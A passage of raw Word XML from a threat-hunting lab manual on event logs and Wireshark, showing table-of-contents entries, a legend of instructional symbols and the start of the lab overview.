            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="396698F0" w14:textId="76A5DD32" w:rsidR="00FB4A76" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc145852569" w:history="1">
            <w:r w:rsidR="00FB4A76" w:rsidRPr="009A1665">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 6.</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FB4A76" w:rsidRPr="009A1665">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Create Visualization of Parent Processes</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145852569 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>21</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="3005FAF1" w14:textId="6398B1B2" w:rsidR="00FB4A76" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc145852570" w:history="1">
            <w:r w:rsidR="00FB4A76" w:rsidRPr="009A1665">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 7.</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FB4A76" w:rsidRPr="009A1665">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Create a Lens Table Detailed View</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145852570 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>24</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="7078BB87" w14:textId="7D1A0413" w:rsidR="00FB4A76" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC3"/>
            <w:tabs>
              <w:tab w:val="left" w:pos="1540"/>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc145852571" w:history="1">
            <w:r w:rsidR="00FB4A76" w:rsidRPr="009A1665">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Step 8.</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:kern w:val="2"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
                <w14:ligatures w14:val="standardContextual"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FB4A76" w:rsidRPr="009A1665">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Experiment with Filters and Understand the Impact</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145852571 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>28</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="62BF0AEC" w14:textId="3FE1812C" w:rsidR="00FB4A76" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc145852572" w:history="1">
            <w:r w:rsidR="00FB4A76" w:rsidRPr="009A1665">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Summary</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145852572 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>31</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="5612FAB1" w14:textId="1A4B0B53" w:rsidR="00FB4A76" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC1"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc145852573" w:history="1">
            <w:r w:rsidR="00FB4A76" w:rsidRPr="009A1665">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145852573 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="312834EA" w14:textId="31FF6829" w:rsidR="00FB4A76" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc145852574" w:history="1">
            <w:r w:rsidR="00FB4A76" w:rsidRPr="009A1665">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix A: Event Id 4688 Fields</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145852574 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>33</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="6E82BBF6" w14:textId="0E182AB9" w:rsidR="00FB4A76" w:rsidRDefault="00000000">
          <w:pPr>
            <w:pStyle w:val="TOC2"/>
            <w:tabs>
              <w:tab w:val="right" w:leader="dot" w:pos="10790"/>
            </w:tabs>
            <w:rPr>
              <w:noProof/>
              <w:kern w:val="2"/>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w14:ligatures w14:val="standardContextual"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc145852575" w:history="1">
            <w:r w:rsidR="00FB4A76" w:rsidRPr="009A1665">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:noProof/>
              </w:rPr>
              <w:t>Appendix B: ElasticSearch Fields</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc145852575 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:t>35</w:t>
            </w:r>
            <w:r w:rsidR="00FB4A76">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="4232C47F" w14:textId="2871CD19" w:rsidR="00991A38" w:rsidRDefault="00991A38">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:noProof/>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1946"/>
        <w:gridCol w:w="7350"/>
      </w:tblGrid>
      <w:tr w:rsidR="0025011C" w14:paraId="13880A44" w14:textId="6C354F10" w:rsidTr="00902ED2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3390" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="63D5937D" w14:textId="1A38CE69" w:rsidR="0025011C" w:rsidRPr="0025011C" w:rsidRDefault="0025011C" w:rsidP="0025011C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0025011C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Symbols Table</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="000000" w:themeFill="text1"/>
          </w:tcPr>
          <w:p w14:paraId="54270096" w14:textId="77777777" w:rsidR="0025011C" w:rsidRPr="0025011C" w:rsidRDefault="0025011C" w:rsidP="0025011C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025011C" w14:paraId="4665BEC4" w14:textId="0FE02078" w:rsidTr="00902ED2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1444" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F" w:themeFill="text1" w:themeFillTint="80"/>
          </w:tcPr>
          <w:p w14:paraId="64FE7CBC" w14:textId="23A0DD48" w:rsidR="0025011C" w:rsidRPr="0025011C" w:rsidRDefault="0025011C" w:rsidP="00B83011">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="0025011C">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Symbol</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1946" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F" w:themeFill="text1" w:themeFillTint="80"/>
          </w:tcPr>
          <w:p w14:paraId="120434AE" w14:textId="319A0AB4" w:rsidR="0025011C" w:rsidRPr="0025011C" w:rsidRDefault="0025011C" w:rsidP="00920678">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7350" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="7F7F7F" w:themeFill="text1" w:themeFillTint="80"/>
          </w:tcPr>
          <w:p w14:paraId="244A64E0" w14:textId="1CC5559A" w:rsidR="0025011C" w:rsidRDefault="0025011C" w:rsidP="0025011C">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
              </w:rPr>
              <w:t>Meaning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025011C" w14:paraId="56FAF41D" w14:textId="5CFC01F5" w:rsidTr="00902ED2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1444" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D2143A0" w14:textId="1C7BDD2C" w:rsidR="0025011C" w:rsidRDefault="003879F5" w:rsidP="0025011C">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="003879F5">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1946" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="202C1A55" w14:textId="3CB8A873" w:rsidR="0025011C" w:rsidRPr="00902ED2" w:rsidRDefault="0025011C" w:rsidP="00920678">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00902ED2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Note</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AE3EAC5" w14:textId="027CC6AD" w:rsidR="0025011C" w:rsidRDefault="003879F5">
            <w:r>
              <w:t>Detailed information that is required to fully understanding the concept or to be able to execute a procedure</w:t>
            </w:r>
            <w:r w:rsidR="009869DE">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>but is not necessarily related to a key learning objective.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025011C" w14:paraId="4E7451DA" w14:textId="0040C882" w:rsidTr="00902ED2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1444" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="326FB13C" w14:textId="52A80005" w:rsidR="0025011C" w:rsidRPr="00B70A1E" w:rsidRDefault="0025011C" w:rsidP="0025011C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00E9336A">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>💡</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1946" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="01EF253D" w14:textId="31EF4DEB" w:rsidR="0025011C" w:rsidRPr="00902ED2" w:rsidRDefault="0025011C" w:rsidP="00920678">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00902ED2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Learning Point</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5058E5FD" w14:textId="608D69B1" w:rsidR="0025011C" w:rsidRDefault="0025011C">
            <w:r>
              <w:t>Information related to key learning objectives.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0025011C" w14:paraId="5C6D7A56" w14:textId="77777777" w:rsidTr="00902ED2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1444" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="06D03631" w14:textId="56E08F4A" w:rsidR="0025011C" w:rsidRPr="00E9336A" w:rsidRDefault="003879F5" w:rsidP="0025011C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B70A1E">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>⚠</w:t>
            </w:r>
            <w:r w:rsidRPr="00B70A1E">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>️</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1946" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7CBBB32A" w14:textId="0A82DD0C" w:rsidR="0025011C" w:rsidRPr="00902ED2" w:rsidRDefault="003879F5" w:rsidP="00920678">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00902ED2">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Warning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="47D54965" w14:textId="5139083F" w:rsidR="0025011C" w:rsidRDefault="00A739CA">
            <w:r>
              <w:t>Important information related to safety and security.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00761D4C" w14:paraId="31BBE87F" w14:textId="77777777" w:rsidTr="00902ED2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1444" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DFEC331" w14:textId="77F03968" w:rsidR="00761D4C" w:rsidRPr="00B70A1E" w:rsidRDefault="00761D4C" w:rsidP="0025011C">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00761D4C">
              <w:rPr>
                <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>✋</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1946" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="51930292" w14:textId="18BB9205" w:rsidR="00761D4C" w:rsidRPr="00902ED2" w:rsidRDefault="00761D4C" w:rsidP="00920678">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Raise Hand</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0FD677BB" w14:textId="7FE484BE" w:rsidR="00761D4C" w:rsidRDefault="00761D4C">
            <w:r>
              <w:t>Raise your hand for instructor assistance. This is often used at critical points to validate your understanding of the material.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4106E890" w14:textId="43F1B9FE" w:rsidR="0072118B" w:rsidRDefault="0072118B"/>
    <w:p w14:paraId="2B79264F" w14:textId="76BAD607" w:rsidR="00991A38" w:rsidRDefault="00991A38">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F11927" w14:textId="12D5E8B1" w:rsidR="00991A38" w:rsidRDefault="00991A38" w:rsidP="00991A38">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc145852561"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Lab</w:t>
      </w:r>
      <w:r w:rsidR="00635444">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00E462B9">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00903BA3">
        <w:t xml:space="preserve">Threat Hunting with Event </w:t>
      </w:r>
      <w:r w:rsidR="005273F1">
        <w:t>Logs and Wireshark</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="117404B6" w14:textId="55B75B72" w:rsidR="00780346" w:rsidRPr="00780346" w:rsidRDefault="00780346" w:rsidP="00780346">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="1" w:name="_Toc145852562"/>
      <w:r>
        <w:t>Overview</w:t>
      </w:r>
      <w:bookmarkEnd w:id="1"/>
    </w:p>
    <w:p w14:paraId="39B64BEF" w14:textId="03E4B39B" w:rsidR="006879FF" w:rsidRDefault="006879FF" w:rsidP="00266487">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
      </w:pPr>
      <w:r w:rsidRPr="003A7D08">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Summary:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A7D08">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00AB5611">
        <w:t xml:space="preserve">The purpose of this lab </w:t>
      </w:r>
      <w:r w:rsidR="004A0BBF">
